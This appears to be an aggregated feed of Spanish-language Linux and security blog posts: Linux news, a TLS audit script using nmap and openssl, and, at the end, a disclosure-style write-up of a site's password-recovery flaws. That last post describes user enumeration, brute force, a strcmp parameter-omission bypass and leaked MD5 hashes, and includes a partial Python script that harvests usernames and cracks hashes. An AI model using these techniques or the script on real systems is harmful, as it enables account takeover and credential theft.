Shared posts

21 Apr 15:51

Curso de GNU/Linux – 25. less

by Sistema Geek

less te permite visualizar documentos de texto desde tu consola de comandos.

➤ ARCHIVOS BASE DEL CURSO
👉 https://drive.google.com/drive/folders/1-Pv25mJmCctGYLlkQAr4Sr1q-EDqhPc0?usp=sharing

⭐ Kite is a free AI-powered coding assistant that will help you code faster and smarter. The Kite plugin integrates with all the top editors and IDEs to give you smart completions and documentation while you’re typing. I've been using Kite for 6 months and I love it! https://www.kite.com/get-kite/?utm_medium=referral&utm_source=youtube&utm_campaign=sistemageek&utm_content=description-only
11 Feb 23:21

Linux Connexion con Aleix Pol en Podcast Linux

by baltolkien

Es un título que empieza como termina. Hoy os invito a escuchar el Linux Connexion con Aleix Pol en Podcast Linux en el que podréis conocer más y mejor a uno de los integrantes fundamentales de la Comunidad KDE, sin el cual yo no estaría tan involucrado en este mundillo.

Hace tiempo que no hablo de Podcast Linux o de otro podcast que no sean los de KDE España, los cuales os invito a seguir en Ivoox.

No es por falta de ganas, es por falta de tiempo y por no monopolizar el blog, ya que la actividad de este tipo de iniciativas comunicativas es más que activa y podría convertir el blog en un monográfico de este tipo de productos.

No obstante, el penúltimo episodio de Podcast Linux merece aparecer por el blog, así que, manos a la obra.

Linux Connexion con Aleix Pol en Podcast Linux

“Hoy vamos a disfrutar de nuevo de la presencia de Aleix Pol, desarrollador, vicepresidente de KDE Internacional y miembro activo en portar KDE Neon a Pinebook.”

De esta forma el gran Juan Febles presenta el podcast número 69 de Podcast Linux, un episodio muy especial para mi porque el desarrollador es uno de los que considero amigos dentro del mundo GNU/Linux.

Y es que mi implicación con KDE nació hasta cuotas insospechadas para mi después de conocer a Aleix en Bilbao, hace ya más de ocho años. Su trabajo ha sido constante y es uno de los responsables de la existencia de KDE España, de los podcast de KDE España, de dispositivos con KDE como los KDE Slimbook y de muchos otros avances tanto por su faceta de programador como de dinamizador social. Todo un referente en la Comunidad KDE.

Es por ello que os animo a que escuchéis atentamente todo lo que nos cuenta en la hora que dura el episodio.

Más información: #69 Linux Connexion con Aleix Pol

10 Feb 21:13

About SSL/TLS security

by Paula

When we transmit sensitive data through the network, we want to feel secure doing it. For that, we use HTTPS traffic, which is HTTP protocol secured via an SSL/TLS. It checks confidentiality and authentication, this last one is done through digital certificates. Let’s explore how to test vulnerabilities surrounding HTTP protocol transmission. What are we going to use?

Openssl

As explained in the official site, openssl is a software library for applications that secure communications over computer networks against eavesdropping or need to identify the party at the other end. It’s usually included in linux systems, but -in debian based systems- can be installed using sudo apt install openssl.

nmap

nmap is a security scanner used to discover hosts and services on a computer network. In debian you can install it using sudo apt install nmap. This is a widely used tool for security, so if you don’t have it and you are into cybersec, it’s a must-install.

Okay let’s do this. What are we going to look for when testing SSL/TLS security? First of all we are going to check if there are weak ciphers or protocols. As explained in OWASP wiki about this topic, anonymous Diffie-Hellmann is a good example of authentication vulnerability, or SSLv2 protocol. With nmap we can scan a host using, for example nmap [target]; a ping only scan usign nmap -sn [target]; TCP SYN ping using nmap -PS [target]. We are foing to use -sV wich is the standard service scan.

nmap -sV www.example.com

We can use other custom options such as -PN, --top-ports and others. Anyway, with this last command we are able to identify the SSL service. Now we can check the certificate information, weak ciphers and SSLv2 each port. We are checking 443,465,993,995 in the example, but this should be customized in each case.

nmap --script ssl-cert,ssl-enum-ciphers -p 443,465,993,995 www.example.com

Finally, openssl is used for testing manually SSL/TLS trying to initiate a renegotiation by client connecting to server with openssl.

openssl s_client -connect www.example.com:443

I created a simple gist for automating all of this using default configuration and customized host. It saves the output in three different files for analysis. Here’s the code:

#!/bin/bash

BLUE='\033[0;36m'
RED='\033[0;31m'
NC='\033[0m' # No Color

#based in OWASP wiki

if [[ -z "$1" || -z "$2" ]]; then
   echo "./tls.sh host directory"

else

    mkdir $2
    cd $2

    echo -e "${BLUE}Checking for Client-initiated Renegotiation and Secure Renegotiation via openssl...${NC}"
    openssl s_client -connect $1:443  > negotiations

    if grep -q 'Secure Renegotiation IS NOT supported' "negotiations"; then
      echo -e "${RED}Secure Renegotiation IS NOT supported.${NC}"
    else
      echo -e "${BLUE}Certificate validity ensured.${NC}"
    fi

    echo -e "${BLUE}Checking for Certificate information, Weak Ciphers and SSLv2 via nmap...${NC}"
    nmap --script ssl-cert,ssl-enum-ciphers -p 443,465,993,995 $1 > ciphernmap

    if grep -q SSLv2 "ciphernmap"; then
      echo -e "${RED}Weak protocol found (SSLv2).${NC}"
    else
      echo -e "${BLUE}No weak protocol found.${NC}"
    fi

    echo -e "${BLUE}SSL service recognition via nmap...${NC}"
    nmap -sV --reason -PN -n --top-ports 100 $1 > nmapsslservice

    echo -e "${BLUE}Done.${NC}"

    echo -e "${RED}Don't forget to manually check the files created in case of doubt. Check OWASP wiki for more information.${NC}"

fi

For more information please heck the amazing wiki of OWASP.

Also written in: https://dev.to/terceranexus6/about-ssltls-security-48fj

10 Feb 18:07

SystemRescueCd 6.0: la veterana distro de rescate se renueva

by J.Pomeyrol

systemrecuecd

Se acaba de publicar una nueva versión de SystemRescueCd, una de esas distros que os recomendamos tener a mano y bien actualizada, pues no ofrece un sistema al uso, sino una potente herramienta de rescate. Aun así, no borréis la versión anterior, porque hay una importante novedad de SystemRescueCd 6.0 que puede no gustaros.

SystemRescueCd es una veterana solución especializada en rescate de sistemas y recuperación de datos -¡también para Windows!- tan interesante para administradores de sistemas como para usuarios avezados, y es que con casi cualquier distribución Linux es posible arrancar en vivo para realizar tales labores; pero SystemRescueCd está expresamente preparada para ello.

SystemRescueCd 6.0 llega con un par de novedades significativas, a destacar el salto de Gentoo a Arch Linux como sistema base, pero también el abandono del soporte de 32-bit, lo cual puede suponerle un pequeño disgusto a quien esté familiarizado con la distribución y lo necesite. A su vez, este cambio de infraestructura y arquitectura han hecho que la imagen engorde de manera considerable hasta los casi 900 MB, cuando antes pesaba poco más de la mitad.

Por lo demás, SystemRescueCd no abandona sus formas y sigue utilizando el entorno de escritorio Xfce, un kernel de soporte extendido (Linux 4.19) y actualiza paquetes por doquier, incluyendo infaltables como el gestor de particiones Gparted, el gestor de volúmenes LVM o los principales sistemas de archivos soportados.

No es que no haya alternativas a SystemRescueCd, que las hay y son igualmente solventes; pero esta es la que vuelve a estar de actualidad y por lo tanto, a la que os recomendamos echar un vistazo: descargadla, revisad el manual para conocerla mejor y sobre todo, probadla a través de una máquina virtual, por ejemplo.

Esta es una de esas distros que conviene tener instaladas en esa memoria USB de 1 o 2 GB que tenéis perdida por algún cajón, y que llegado el momento os puede salvar la tarde.

10 Feb 18:03

Alternativas libres a TeamViewer

by maslinux

TeamViewer es una aplicación que te permite conectarte remotamente a múltiples estaciones de trabajo. Hay muchas aplicaciones que permiten el control remoto de diferentes sistemas, pero TeamViewer está configurado para ser extremadamente accesible, a la vez que potente. Ya sea que trabajes a distancia de tu ordenador o simplemente ayudes a un amigo, tipo cuñado, a reparar a distancia, es una aplicación que vale la pena instalar en tu sistema pero hay un problema. TeamViewer no es software libre y creo que es correcto no usar este tipo de software .. si tenemos alternativas.

En este artículo te presentaré algunas alternativas de código abierto que pueden ayudarte a hacer lo que hace TeamViewer.

TightVNC

TightVNC es un programa de control de escritorio remoto gratuito, multiplataforma y de código abierto, adecuado para fines administrativos, educativos y de soporte técnico.

TightVNC es razonablemente sencillo y se ejecuta en segundo plano sin ninguna molestia para el usuario. Está claramente minimizado en la barra de tareas y se puede colocar sobre él cuando llegue el momento en que necesitse soporte remoto. Al ser una generación de software más bien antiguo, es muy ligero en cuanto a recursos y no ralentiza ningún proceso central dentro del sistema operativo. Lo mejor de todo es que es libre y gratis para uso personal y comercial.

Sus características también incluyen un cliente Java, compatibilidad con el software VNC estándar, cumplimiento de las especificaciones del protocolo RFB, seguridad fiable, etc.

DWService

DMService es un programa de acceso remoto de escritorio ligero, gratuito, multiplataforma y de código abierto, con énfasis en la facilidad de uso, la seguridad y el rendimiento.

Puede instalarse en todas las plataformas de escritorio populares o ejecutarse completamente desde su navegador web – todo lo que tendrás que hacer es iniciar sesión. Sus características incluyen soporte para sesiones de terminal, un editor de texto incorporado, administración de recursos, vigilancia de registros y uso compartido de archivos.

Puedes iniciar el navegador web desde cualquier dispositivo que se conecte al sitio web de DWService y obtener inmediatamente el control del ordenador.

Remmina

 

Remmina es una aplicación POSIX (Portable Operating System Interface) rico en funciones que permite a los usuarios acceder de forma remota a cualquier sistema operativo con GNU/Linux.

Se desarrolló con el objetivo de servir tanto a los administradores de sistemas como a los viajeros, tanto si trabajan con netbooks pequeños como con monitores grandes. Tiene soporte para varios protocolos de red incluyendo RDP, VNC, NX, SSH, EXEC, SPICE y XDMCP.

Remmina también cuenta con una interfaz de usuario integrada y coherente, y puede utilizarse libremente tanto para fines personales como comerciales.es una aplicación gratuita y de código abierto de alto rendimiento, independiente de la plataforma de acceso remoto al escritorio. Utiliza encriptación por defecto y es capaz de ejecutar aplicaciones de vídeo y 3D a través de la red.

TigerVNC

 

TigerVNC es una aplicación gratuita y de código abierto de alto rendimiento, independiente de la plataforma de acceso remoto al escritorio. Utiliza encriptación por defecto y es capaz de ejecutar aplicaciones de vídeo y 3D a través de la red.
El proyecto de TigerVNC fue fundado por algunos de los desarrolladores anteriores de TightVNC, Red Hat, y el proyecto VirtualGL a principios de 2009, con la meta de proporcionar una solución de alto rendimiento de VNC basada en las bases de código de RealVNC 4 y de X.org. A lo largo de 2010 y 2011, el proyecto VirtualGL contribuyó con muchas horas de trabajo al desarrollo de TigerVNC, con la esperanza de convertirlo en “TurboVNC. 2.0”.

 

X2Go

 

X2Go es un programa de escritorio remoto multiplataforma, gratuito y de código abierto que funciona con un protocolo NX 3 modificado y funciona de forma excelente incluso con anchos de banda reducidos.

Puedes utilizarlo para acceder a cualquier interfaz de GNU/Linux y a la de un sistema Windows a través de un proxy. También ofrece soporte de sonido, reconexión a una sesión de otro cliente, compartición de archivos.

X2Go es muy adecuado para conexiones de bajo ancho de banda, tiene soporte para sonido con PulseAudio y permite compartir el escritorio. La aplicación consta de dos partes, x2goclient para el lado del cliente y x2goserver (que debe estar instalado en el sistema de escritorio al que se debes acceder). El software cliente X2Go está disponible para Windows, Mac OS X y GNULinux.

 

Apache Guacamole

 

Apache Guacamole es una puerta de enlace gratuita y de código abierto de escritorio remoto basada en web HTML5 para acceder a cualquier ordenador desde cualquier lugar – todo lo que necesitas es una conexión a Internet.

Apache Guacamole ofrece a los usuarios la comodidad de acceder tanto a los sistemas físicos como a los sistemas en nube de una manera verdaderamente informática.

Soporta todos los protocolos estándar sin excluir los protocolos RDP y VNC, puede ser utilizado a nivel empresarial, no requiere ningún tipo de plugin, y los administradores pueden monitorear/matar las conexiones en tiempo real, así como administrar los perfiles de los usuarios.

 

mRemoteNG

 

mRemoteNG es una bifurcación de mRemoteNG: un gestor de conexiones remotas, de código abierto, con pestañas y multiprotocolo. mRemoteNG añade correcciones de errores y nuevas funciones a mRemoteNG.

Te permite ver todas tus conexiones remotas en una interfaz simple pero potente con pestañas.

mRemoteNG soporta los siguientes protocolos:

  • RDP (Escritorio remoto/Servidor terminal)
  • VNC (Computación de Red Virtual)
  • ICA (Arquitectura de Computación Independiente de Citrix)
  • SSH (Secure Shell)
  • Telnet (RED DE TELECOMUNICACIONES)
  • HTTP/HTTTPS (Protocolo de transferencia de hipertexto)
  • rlogin
  • Conexiones raw socket

 

KRDC

 

KRDC (KDE Remote Desktop Connection) es un software de aplicación QT, particularmente un cliente de escritorio remoto de KDE.

Tanto los protocolos de Virtual Network Computing (VNC) y Remote Desktop Protocol (RDP) son compatibles de manera similar a Unix y Windows, por lo cual se pueden accesar usando este software. Como parte de la GSoC, los desarrolladores de proyectos ayudaron compilando a Libvncserver en las plataformas de Windows, lo que permite tener a KRDC un port para Windows.

 

 

Pedro

 

 

 

 

10 Feb 17:50

Cómo personalizar Thunderbird con CustomizeMyBird

by maslinux

El cliente de correo electrónico Thunderbird te permite administrar fácilmente tu correo electrónico ya sea que estés en tu escritorio o en una ubicación remota con tu portátil. Para la mayoría de los tipos de usuarios, Thunderbird tiene suficientes personalizaciones incorporadas. Algunos usuarios, por otro lado, pueden encontrar que el cliente de correo electrónico de código abierto no está disponible en ese ámbito.

Para aquellos que estén familiarizados con la oferta principal de Mozilla (también conocido como Firefox), saben que hay una herramienta muy útil llamada about:config. Esa herramienta da a los usuarios acceso a una tonelada de personalizaciones para el navegador web. Desafortunadamente, el cliente de correo electrónico no ofrece a los usuarios la posibilidad de escribir about:config en una barra de direcciones para acceder a dichas preferencias. Sin embargo, con un complemento fácil de usar, puedes acceder a algo muy similar. Este complemento se llama CustomizeMyBird.

Este complemento de Thunderbird te da acceso a funciones de personalización como:

  • Pestañas (cambiar entre las pestañas predeterminadas y las pestañas cuadradas clásicas, altura personalizada, redondez de bordes personalizada, ocultar los botones, cambiar de posición)
  • Menú principal (barra de herramientas de las pestañas superior e inferior, vista compacta, colores Aero blue, vista compacta)
  • Encabezado de la ventana (colores personalizados)
  • Barras de herramientas (colores por defecto / colores azules Aero)
  • Barra de desplazamiento (ocultar, transparencia/colores personalizados, tamaño)
  • Barra de estado (ocultar barra de estado)
  • Barra de filtro rápido (moverse debajo de la lista de correo)
  • Código CSS personalizado por el usuario
  • Y mucho, mucho más

Sí, las opciones disponibles para el complemento se refieren a la apariencia, pero el desarrollador ha hecho un gran trabajo al incluir opciones de apariencia que realmente pueden ayudar a hacer que tu experiencia con Thunderbird sea más eficiente y muy personalizada.

Si estás intrigado, vamos a instalarlo.

Instalación

La instalación es muy sencilla. Aquí está cómo hacer que esto suceda:

  • Abre Thunderbird.
  • Haz clic en el botón Menú en la esquina superior derecha de Thunderbird.
  • Haz clic en Complementos | Complementos.
  • En la sección “Up & Coming”, haz clic en Ver todo.
  • Escribe CustomizeMyBird en la barra de búsqueda.
  • Haz clic en Añadir a Thunderbird.
  • Cuando se te solicite, haz clic en Instalar.
  • Permite que la instalación se complete.

Uso

Una vez instalado, haz clic en el botón Thunderbird Menu y clic en Add-ons | CustomizeMyBird. En la ventana resultante (Figura A), puedes empezar a desplazarte por las opciones disponibles para personalizar tu experiencia con Thunderbird y adaptarla perfectamente a tus gustos y necesidades.

Figura A

Algunas de las opciones disponibles te permiten volver a una apariencia más antigua para Thunderbird o compactar las vistas de ciertas características. Para aquellos que prefieren las viejas formas del cliente de correo electrónico, o que tienden a tener una interfaz más elegante, se alegrará de ver estas opciones.

Muchas de las opciones disponibles son habilitar/deshabilitar, o selecciones desplegables. Algunas, por otro lado, son porcentajes o tamaños definidos por el usuario (en píxeles). Lo mejor que puedes hacer es repasar todas las opciones y probar lo que te gusta y lo que no.

Una sugerencia

Te cansará rápidamente de hacer clic entre la pestaña CustomizeMyBird y la pestaña principal de Thunderbird (para ver los cambios). Hay una manera mejor:

  • Abre Thunderbird.
  • Abre la pestaña CustomizeMyBird .
  • Haz clic y arrastra la pestaña CustomizeMyBird  fuera de la ventana de Thunderbird (de manera similar a arrastrar una pestaña de Firefox para crear una nueva ventana).

Con CustomizeMyBird en su propia ventana, puedes ir a través de los cambios (con las ventanas una al lado de la otra) y ver las personalizaciones a medida que ocurren (ya que todas las opciones cambian y se guardan instantáneamente).

CustomizeMyBird es una verdadera bendición para aquellos que prefieren personalizar esta aplicación cliente de correo electrónico. Probablemente obtendrás mucha satisfacción con este práctico complemento de Thunderbird.

Fuente

10 Feb 17:46

¿Por qué usas GNU/Linux? (Encuesta)

by maslinux

La verdad es que esta pregunta nunca la había hecho y no deja de ser intrigante.

Lo sé, puedes usar GNU/Linux por todas las razones expuestas en el formulario y muchas más pero seguro que tienes una razón más poderosa que otra. Mi primera razón hace tiempo fue porque quería salir de Windows inmediatamente pero sin duda, a medida que transcurría el tiempo esas razones se fueron ampliando y me di cuenta que lo que tenía era cero razones para usar Windows y todas para usar usar GNU/Linux.

Hay gente que sencillamente decidió cambiar por probar solamente. De igual modo también hay usuarios que han sido presa de los virus y vulnerabilidades del lado oscuro, pero también profesionales de las TI que ven esta plataforma como la mejor para desarrollar, así como enamorados de las redes.

Pero ¿ y tú? ¿Por qué razón principal lo usas?

 

*La encuesta estará activa hasta las 0:00 horas del día 3 de febrero.

10 Feb 17:43

Firefox 66 utilizará CSD de forma predeterminada en GNU/Linux

by maslinux

La próxima versión de Mozilla Firefox para Linux utilizará la decoración del lado del cliente (CSD) por defecto.

Firefox CSD ha estado disponible en las versiones de Linux desde hace tiempo, pero sobre una base totalmente de inclusión voluntaria.

 

Los usuarios que deseen combinar la barra de título y la barra de pestañas de su navegador deben hacer todo lo posible para marcar una casilla en el panel Personalizar… Pero no por mucho más tiempo.

Mozilla planea enviar Firefox 66 con decoración del lado del cliente de forma predeterminada en Linux; los usuarios ya no tendrán que hacer nada para activarlo.

Aquellos que quieran desactivar Fiefox CSD podrán hacerlo marcando una casilla en el panel Personalizar…..

¿Utiliza Firefox CSD?

 

Habilitar la barra de título/barra de pestañas combinada en Firefox es una de las primeras cosas que hago después de instalar Ubuntu. Las decoraciones del lado del cliente aprovechan mejor el espacio de la pantalla, combinando la barra de herramientas principal de la aplicación con la barra de título de la ventana, que se adapta mejor a la pantalla.

Y la apariencia aerodinámica es incluso mejor ahora que la GTK CSD de Firefox es capaz de dibujar esquinas redondeadas.

Pero no todos son fans. Algunos dicen que adherirse a GTK CSD en Linux crea disparidad o falta de integración con escritorios que no son de GTK, como Plasma y LXQt.

Joey Sneddon de omgubuntu

 

10 Feb 17:42

OPNsense 19.1 un sistema para firewall y enrutamiento de código abierto

by David Naranjo

opnsense_logo

Después de 6 meses de desarrollo, los desarrolladores de OPNsense realizaron el anuncio del lanzamiento del kit de distribución para crear firewalls OPNsense 19.1.

OPNsense es una rama del proyecto pfSense, diseñado para crear una distribución completamente abierta que podría tener la funcionalidad de soluciones comerciales para el despliegue de firewalls y pasarelas de red.

Principales características de OPNsense

A diferencia de pfSense, este proyecto se posiciona por no ser controlado por una empresa, si no que su desarrollado se lleva acabo con la participación directa de la comunidad.

Con ello se tiene un proceso de desarrollo completamente transparente, además de brindar la oportunidad de utilizar cualquiera de sus desarrollos en productos de terceros, incluidos los comerciales.

Con lo cual la fuente de distribución del código, así como de los componentes, así como las herramientas que se utilizan para construir este sistema o ampliarlo se rigen directamente bajo la licencia BSD.

Entre las posibilidades OPNsense se pueden distinguir las herramientas de compilación totalmente abiertas, la capacidad de instalar en forma de paquetes sobre FreeBSD, el equilibrio de carga, la interfaz basada en web para organizar a los usuarios para conectarse a la red.

Por otro lado, se encuentra la presencia de mecanismos para el seguimiento del estado de las conexiones (firewall de estado basado en pf) ancho de banda, filtrado de tráfico, creación de VPN basada en IPsec, OpenVPN y PPTP, integración con LDAP y RADIUS, soporte para DDNS (DNS dinámico), un sistema de informes visuales y gráficos.

Además, el kit de distribución proporciona los medios para crear configuraciones tolerantes a fallas basadas en el uso del protocolo CARP.

Esto permite ejecutar un nodo de repuesto además del firewall principal, que se sincronizará automáticamente en el nivel de configuración y se hará cargo de la carga en caso de fallo del nodo primario.

Al administrador se le ofrece una interfaz moderna y simple para configurar un firewall, construido con el marco web Bootstrap.

Sobre la nueva versión de OPNsense 19.1

Como fue mencionado al inicio recientemente se dio a conocer este nuevo lanzamiento y en este se ha implementado la transición al uso de HardenedBSD 11.2.

ScreenShot_OPNSense

Así como la bifurcación de FreeBSD 11.2, que integra mecanismos y técnicas de protección adicionales para contrarrestar los métodos de explotación de vulnerabilidades.

Con esta nueva versión podremos hacer uso de la capacidad de utilizar la autenticación de dos factores basada en una combinación de autenticación a través de un servidor LDAP externo y un sistema local de contraseñas de un solo uso TOTP.

Otro factor integrado es la API para administrar alias en reglas de firewall (permite usar variables en lugar de hosts, números de puertos y subredes) así como la API para exportar la base de clientes OpenVPN.

También se admite el modo de limitación de ancho de banda basado en el algoritmo PIE (RFC-8033) y la capacidad de mantener un registro de las reglas de NAT.

El soporte para WPAD / PAC y las conexiones de proxy principal se ha agregado al proxy web que, así como la capacidad de exportar certificados P12 con contraseñas definidas por el usuario.

De las demás características que se pueden encontrar en este lanzamiento son:

  • Plugin para reglas de telemetría ET Pro.
  • La adición de Dpinger para monitorear la disponibilidad de la puerta de enlace
  • Soporte extendido de IPv6 DUID.
  • Apoyo Dnsmasq DNSSEC.
  • Actualización de software: LibreSSL 2.7, Unbound 1.8, Suricata 4.1, Phalcon 3.4, Perl 5.28.
  • Archivos de traducción de interfaz actualizados al ruso.
  • El tema de diseño de interfaz predeterminado ofrece un menú lateral plegable.
  • Complementos de exportación de copia de seguridad actualizados, Bind, Nginx, Ntopng, VnStat y Dnscrypt-proxy.

Descarga la nueva versión de OPNsense 19.1

Si quieres obtener esta nueva versión solamente debes de dirigirte a su página web oficial y en la sección de descargas podrás obtener el enlace para descargar esta nueva versión.

Los ensamblajes se prepararon en forma de un LiveCD y una imagen del sistema para escribir en unidades Flash el tamaño de la imagen es de  aproximadamente 265 MB.

 

El artículo OPNsense 19.1 un sistema para firewall y enrutamiento de código abierto aparece primero en OPNsense 19.1 un sistema para firewall y enrutamiento de código abierto.

10 Feb 17:35

Esto es Firefox 66 y lo que nos preparan para este próximo lanzamiento

by David Naranjo

firefox 66

El lanzamiento de la versión de Firefox 66 programado para el 19 de marzo y los desarrolladores ya han dado a conocer los planes que tienen para esta próxima versión.

De las cosas que vale la pena destacar que podremos encontrar en Firefox 66 es que se planea habilitar el bloqueo predeterminado de la reproducción automática de contenido multimedia con sonido usando la propiedad de reproducción automática sin establecer la marca de silencio o la ausencia de una pista de audio.

Firefox 66 promete un mayor ahorro de banda

Debido a la gran cantidad de pestañas que hoy en día abre un usuario comúnmente, la mayoría de los sitios web implementan vídeos con auto reproducción lo cual puede ser bastante molesto si no te encuentras posicionado en este sito.

Es por ello que los desarrolladores pretenden que la reproducción del sonido comenzará solo con la acción explícita del usuario, por ejemplo, cuando presiona un botón o hace clic en un vídeo.

En el lanzamiento de Firefox 66, se planea habilitar el modo de bloqueo de la reproducción automática de manera predeterminada para el 25% de los usuarios del navegador y una semana después del lanzamiento, para ampliar la cobertura al 50%.

Si no hay problemas importantes, dos semanas después del lanzamiento de Firefox 66, el bloqueador se activará para todos los usuarios.

En cualquier momento, el usuario puede activar el bloqueador manualmente configurando la opción media.autoplay.default = 1 en about: config.

Para deshabilitar cualquier reproducción automática de vídeo, independientemente de la presencia de sonido, puede cambiar el valor de la opción “media.autoplay.allow-muted”.

Cuando abre la página que reproduce automáticamente el sonido, se notificará al usuario sobre el bloqueo.

La notificación proporcionará una opción que le permitirá habilitar la reproducción automática de sonido para el sitio actual, si lo desea el usuario.

Desactivacion de autoreproduccion

Puede cambiar el estado de bloqueo a través del bloque de configuración que se muestra en el menú contextual del sitio.

Se agregará una opción al configuracion (about: config preferences # privacy or “Preferences / Privacy and Security / Permissions”) para configurar el modo de bloqueo (bloquear de forma predeterminada, preguntar sobre el bloqueo cada vez o bloquear solo los sitios incluidos en la lista negra), y se ofrecerá una interfaz para gestionar la lista blanca y negra.

El bloqueador propuesto le permitirá resistir los abusos en algunos sitios que muestran automáticamente anuncios de vídeo con sonido, lo que crea inconvenientes y distrae al usuario cuando navega. Un bloqueo similar se implementó previamente en Chrome 64 y se ha probado en forma de una opción oculta desde Firefox 62.

Firefox contra los clics fraudulentos

Otro cambio importante es el soporte para “Scroll Anchoring el cual se ha agregado a la base de código de Firefox, lo que eliminará los problemas asociados con la violación de la posición en la página después de mostrar elementos adicionales.

La posición de desplazamiento ahora se vinculará a un lugar específico en la página y no cambiará cuando se muestren nuevos elementos en el área superior.

Por ejemplo, habrá una situación en el pasado cuando el desplazamiento inmediato después de abrir una página conduce a un cambio de posición y la necesidad de desplazarse una y otra vez a medida que se cargan las imágenes.

Tal comportamiento interfirió fuertemente con el trabajo con páginas con un gran número de imágenes externas y a menudo, provocó incidentes con clics en el enlace incorrecto.

Constantemente se encuentra una situación cuando, al momento de hacer clic en el enlace necesario, la carga del banner publicitario de arriba termina por interferir en el clic y caer en el banner.

Finalmente, en Firefox 66 para Linux será transferida la utilización de decorar el modo de ventanas en el lado del cliente (CSD, Client Side Decoration).

El uso de CSD permite acercar la interfaz de Firefox al diseño de las aplicaciones estándar de GNOME, es decir, mover las barras de pestañas al título de la ventana e implementar marcos ocultos.

En Firefox 60, esta función se implementó como una opción, que en Firefox 66 estará activa de forma predeterminada.

El artículo Esto es Firefox 66 y lo que nos preparan para este próximo lanzamiento aparece primero en Esto es Firefox 66 y lo que nos preparan para este próximo lanzamiento.

10 Feb 15:15

¿Cúantos fallos de seguridad puede tener la funcionalidad de recuperar contraseña?

by Rollth

Muy buenas a todos,

para hoy tenía pensado hacer un nuevo Post sobre Responsible Disclosure, pero como envié un correo electrónico y me ignoraron de una manera muy fuerte, lo que voy a hacer es explicar como funcionan las vulnerabilidades (sin decir donde se encuentran, quien quiera que lo busque) para ver si a alguien le puede servir para aprender algo nuevo.

Además del correo electrónico también envie un MD por twitter, donde también me ignoraron, así que voy a publicar toda la información.

Una vez visto esto ya podemos empezar, lo primero que tengo que decir es que solo mire el proceso de recuperar contraseñas, pero imagino que el resto de la web será del estilo, parece ser un sitio bonito donde jugar.

Vamos a ir paso por paso porque hay mucho que abarcar, así que vamos a comenzar desde el principio, lo primero que podemos ver es una pantalla donde nos pide que introduzcamos el DNI para empezar el flujo de modificar contraseñas.

En caso de introducir un DNI que exista en la base de datos te lleva al siguiente paso, y en caso de introducir un DNI no existente te mantiene en la misma pantalla. Aquí podemos encontrar el primer error de seguridad (aunque no sea grave). Es posible enumerar a través de los DNIs todos los usuarios registrados en la aplicación dependiendo de la respuesta, yo para esto me hice un script en python que comprobando el tamaño de la respuesta detectaba si el usuario existe o no en la base de datos (más tarde mostraré el script ya que después le añadí nuevas funcionalidades).

Una vez en este punto podemos ir al siguiente paso introduciendo algún DNI que nos arroje el script de python.

Podemos ver que la forma de recuperar la contraseña es la típica pregunta de seguridad, esto es algo que no se debería usar en ningún caso por los siguientes motivos:

  • Estás indicando a un posible atacante por donde tiene que empezar a buscar para poder evadir esta medida de seguridad.

  • Suele ser información poco privada y fácil de conseguir.

  • Los usuarios no suelen recordar que pusieron esta información como pregunta de seguridad, por lo que preguntando (a diferencia de una contraseña), no es difícil de que te de esa información.

  • En caso de no tener una forma de bloquear los ataques de fuerza bruta es fácil buscar una lista de respuestas posibles a esa pregunta.

En mi caso, como no conozco al usuario en cuestión, vamos a optar por el último punto, así que buscaremos una lista de colores en Google y lanzaremos un ataque de fuerza bruta. De la misma forma que con los colores se puede hacer con nombres de mascota, con el nombre del padre, o con cualquier pregunta que nos encontremos.

Una vez en este punto ya podríamos modificarle la contraseña al usuario y entrar en su perfil sin ningún problema.

La cuestión de todo esto es que la cosa no acaba aquí, está funcionalidad, además de ser vulnerable a fuerza bruta, se puede byppasear, ¿cómo hacemos esto?

Es bastante simple, en el funcionamiento normal de la aplicación la respuesta a la pregunta se envía por parámetro, y si la respuesta no es correcta te devuelve un mensaje de error, sin embargo, si no se envía este parámetro toma la respuesta como válida y nos deja seguir.

¿Por qué ocurre esto? mi suposición al estar programada en PHP la aplicación web es que tienen el siguiente código.

    <?php
    $respuesta = $_POST['respuesta'];
    $respuesta_correcta = "Respuesta correcta";
    if (strcmp($respuesta, $respuesta_correcta) != 1 && strcmp($respuesta, $respuesta_correcta) != -1) {
            // Respuesta correcta
    }
    else{
            // Respuesta incorrecta
    }
    ?>

Vamos a ver que está pasando aquí, la función “strcmp” en php, tiene dos respuestas diferentes dependiendo de los datos introducidos:

  • En caso de que ambos strings sean iguales el resultado será 0.
  • En caso de que los strings no sean iguales el resultado será 1 o -1 dependiendo de cual sea mayor.

Por lo tanto en principio ese código será correcto, ya que está comprobando que los dos Strings sean diferentes, pero ¿qué pas si no envío el parametro?

Bueno, la función haría algo así: “trcmp(NULL, $respuesta_correcta)”, en este caso el resultado sería 3 o -3, por lo que el código lo tomará como si la respuesta fuera correcta y veríamos lo siguiente.

En este punto podríamos cambiarle la contraseña a quien nosotros quisieramos teniendo solo el DNI, además de poder ver los DNIs que están registrados en la aplicación, aunque esto es una pena, porque la cosa no se queda aquí.

Si le echamos un vistazo rápido a la respuesta HTML del servidor tras esta petición vemos, que además de devolver el nombre de usuario, también nos devuelve el hash MD5 que está almacenado en la base de datos.

Aquí tenemos el nombre de usuario, el hash en MD5 y la longitud de la contraseña, que nos dice que son entre 4 y 8 caracteres, esto hace que sea mucho más sencillo crackearlas, podemos hacer una prueba en crackstation.

Con todo esto preparé un script en python que generaba DNIs de forma aleatoria, comprobaba que existieran y en caso de que existieran parseaba el usuario y el hash, crackeaba este hash a través de una base de datos online e imprimía toda esta información.

El script que preparé (se que es muy chustero) es este.

    #!/usr/bin/python
    # -*- coding: UTF-8 -*-
    import json
    from random import randint
    import requests
    import urllib3
    from html.parser import HTMLParser
    from bs4 import BeautifulSoup as BSoup
    import sys
    urllib3.disable_warnings()
    # Crackea un hash
    def decrypt(hash):
            content = requests.get('https://md5.gromweb.com/?md5=' + hash)
            soup = BSoup(content.text, "html.parser")
            hashresult = soup.find('em', attrs={'class': 'long-content string'})
            if hashresult:
                    return hashresult.text
    # Parsea la respuesta y obtiene Hash
    class MyHTMLParser(HTMLParser):
            def handle_starttag(self, tag, attrs):
                    for attr in attrs:
                            if attr[0] == "value":
                                    if len(attr[1]) == 32:
                                            hash1 = attr[1]
                                            if decrypt(hash1):
                                                    print "Password: " + decrypt(hash1)
                                                    f.write(" - Password: " + decrypt(hash1))
                                            else:
                                                    print "Hash: " + attr[1]
                                                    f.write(" - Hash: " + attr[1])
                                    if len(attr[1]) != 32:
                                            print "Usuario: " + attr[1]
                                            f.write(" - Usuario: " + attr[1] + "\n")
    URL = "https://ws035.dominio.es"
    path = "/bolsa/http/olvidoclave3.php"
